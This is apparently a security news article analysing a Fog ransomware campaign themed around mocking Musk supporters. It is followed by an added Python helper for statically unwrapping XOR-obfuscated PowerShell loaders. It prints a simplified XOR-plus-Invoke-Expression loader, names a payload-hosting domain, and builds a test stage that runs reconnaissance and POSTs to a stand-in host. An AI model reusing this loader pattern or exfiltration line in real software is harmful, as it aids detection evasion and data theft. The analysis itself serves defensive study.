A sophisticated ransomware campaign specifically targeting and mocking supporters of Elon Musk has been identified by cybersecurity researchers.
The attack, identified as a variant of Fog ransomware, uses multi-stage PowerShell scripts and Netlify-hosted payloads to execute its malicious code.
This campaign represents a concerning evolution in politically themed malware that combines financial motivation with satirical commentary.
The ransomware distinguishes itself through its unusual ransom note, which impersonates an individual named “Edward Coristine” allegedly associated with DOGE.
Ransom Note (Source – X)
In a bizarre twist, the note lists government email addresses as technical support contacts and contains satirical content directed at Musk supporters.
Upon execution, the malware launches a YouTube video mocking Elon Musk, serving both as a distraction technique and as reinforcement of its parodic nature.
KrakenLabs researchers identified the campaign after tracing a series of infections back to phishing emails containing PDF attachments with misleading “Pay Adjustment” titles.
The attack employs a sophisticated chain involving .lnk file droppers and multiple stages of PowerShell execution, demonstrating a blend of technical prowess and psychological manipulation aimed at specific groups.
The complete infection chain involves multiple components working in concert. The initial compromise begins with a phishing PDF that links to a Netlify-hosted ZIP archive, which then deploys a sequence of PowerShell scripts beginning with “Pay.ps1”, the script that orchestrates the attack.
The core payload consists of “cwiper.exe” (the actual ransomware component), “ktool.exe” (which uses an Intel bring-your-own-vulnerable-driver (BYOVD) technique for kernel-level access), and specialized PowerShell scripts for reconnaissance.
Despite its satirical presentation, the presence of a Monero cryptocurrency wallet confirms the attack’s financial motivation beneath its trolling veneer.
This dual-purpose approach, financial gain masked by political mockery, represents an emerging trend in ransomware tactics that attempt to obscure criminal intent behind ideological facades.
Infection Mechanism Details
The infection begins when victims open a phishing PDF purportedly containing pay adjustment information.
Malicious PDF (Source – X)
This document links to a Netlify-hosted domain (hilarious-trifle-d9182e.netlify.app) where the malicious payloads are stored.
The initial PowerShell script (“Pay.ps1”) acts as the first-stage loader, which downloads and executes “stage1.ps1”, the main orchestration component.
This script is responsible for deploying the remaining modules and establishing persistence.
# Simplified representation of the XOR deobfuscation routine used in trackerjacker.ps1
$encoded = "XOR-obfuscated payload data"   # placeholder for the obfuscated blob embedded in the script
$key = "KrakenObserved2025"                # repeating XOR key embedded alongside it
# XOR each byte of the blob with the corresponding key byte (the key wraps around)
[byte[]]$decoded = for ($i = 0; $i -lt $encoded.Length; $i++) {
    [byte]([int]$encoded[$i] -bxor [int]$key[$i % $key.Length])
}
# The recovered script text is executed straight from memory and never written to disk
Invoke-Expression([System.Text.Encoding]::ASCII.GetString($decoded))
The most technically sophisticated component is “trackerjacker.ps1”, which employs XOR-based obfuscation to evade detection; because the decoded text is passed straight to Invoke-Expression, the plaintext stage exists only in memory.
After deobfuscation, this script performs system reconnaissance, while “lootsubmit.ps1” leverages the Wigle API for geolocation data gathering.
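The XOR-plus-Invoke-Expression pattern above is easy to unwrap statically, which is how an analyst recovers the next stage without running it. The following Python helper is an added example written for this page; it is not code from the original article or from KrakenLabs. It assumes (the page shows only placeholder strings) that the loader stores the obfuscated blob as a Base64 string literal assigned to `$encoded` and the key as a string literal assigned to `$key`; the sample plaintext stage is constructed for the demonstration, and only the key literal “KrakenObserved2025” is taken from the snippet above.

```python
import base64
import re
import string
from typing import Optional

# Key literal from the simplified snippet on the page. The plaintext stage is
# CONSTRUCTED for this example; it is not content recovered from the sample.
SAMPLE_KEY = b"KrakenObserved2025"
SAMPLE_PLAINTEXT = (
    b"Get-ComputerInfo | Out-File $env:TEMP\\recon.txt; "
    b"Invoke-WebRequest -Uri 'https://example.invalid/submit' -Method POST"
)


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR, the same operation as the loader's for-loop.
    XOR is its own inverse, so one function both obfuscates and unwraps."""
    if not key:
        raise ValueError("empty key")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


PS_TOKENS = (b"Invoke-", b"Get-", b"Set-", b"$env:", b"New-Object", b"IEX")
PRINTABLE = set(string.printable.encode())


def looks_like_powershell(blob: bytes) -> bool:
    """Cheap plausibility check for a decoded stage: almost all printable
    ASCII plus at least one PowerShell token. Rejects wrong-key garbage."""
    if not blob:
        return False
    ratio = sum(b in PRINTABLE for b in blob) / len(blob)
    return ratio > 0.95 and any(tok in blob for tok in PS_TOKENS)


# ASSUMPTION (not from the page): blob is a Base64 literal in $encoded and the
# key is a plain string literal in $key.
BLOB_RE = re.compile(r'\$encoded\s*=\s*["\']([A-Za-z0-9+/=]+)["\']')
KEY_RE = re.compile(r'\$key\s*=\s*["\']([^"\']+)["\']')
IEX_RE = re.compile(r'\b(Invoke-Expression|IEX)\b', re.IGNORECASE)


def build_loader(plaintext: bytes, key: bytes) -> str:
    """Builds a loader in the shape of the page's snippet so the unwrapper can
    be exercised offline. Constructed test input, not the real Pay.ps1."""
    blob = base64.b64encode(xor_bytes(plaintext, key)).decode()
    return (
        f'$encoded = "{blob}"\n'
        f'$key = "{key.decode()}"\n'
        '$bytes = [Convert]::FromBase64String($encoded)\n'
        '$decoded = for($i=0; $i -lt $bytes.Length; $i++) '
        '{ $bytes[$i] -bxor $key[$i % $key.Length] }\n'
        'Invoke-Expression([System.Text.Encoding]::ASCII.GetString($decoded))\n'
    )


def has_iex_sink(loader: str) -> bool:
    """True when decoded text is handed to Invoke-Expression/IEX, the sink
    that turns a harmless string transform into a code loader."""
    return IEX_RE.search(loader) is not None


def unwrap_loader(loader: str) -> Optional[bytes]:
    """Statically recovers the next stage: pull both literals, XOR them back
    together, and only accept output that plausibly is PowerShell."""
    m_blob, m_key = BLOB_RE.search(loader), KEY_RE.search(loader)
    if not (m_blob and m_key):
        return None
    decoded = xor_bytes(base64.b64decode(m_blob.group(1)), m_key.group(1).encode())
    return decoded if looks_like_powershell(decoded) else None


def triage(loader: str) -> dict:
    """One-shot summary for a suspect .ps1 stage: is there an XOR loop, does
    the result feed IEX, and what does the recovered next stage contain."""
    decoded = unwrap_loader(loader)
    return {
        "xor_loop": "-bxor" in loader,
        "iex_sink": has_iex_sink(loader),
        "decoded": decoded.decode("ascii", "replace") if decoded else None,
    }


if __name__ == "__main__":
    sample = build_loader(SAMPLE_PLAINTEXT, SAMPLE_KEY)
    print(triage(sample))
```

The plausibility check matters because a wrong key still yields bytes; requiring mostly printable output with a recognisable cmdlet token is what separates a real recovery from noise. In a sandbox, the equivalent dynamic trick is to replace `Invoke-Expression` with `Write-Output` so the loader prints its next stage instead of running it.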
Together with “cwiper.exe”, which performs the actual encryption, and “ktool.exe”, which provides kernel-level access through a legitimate, signed Intel driver, this attack demonstrates a concerning level of technical sophistication behind its satirical facade.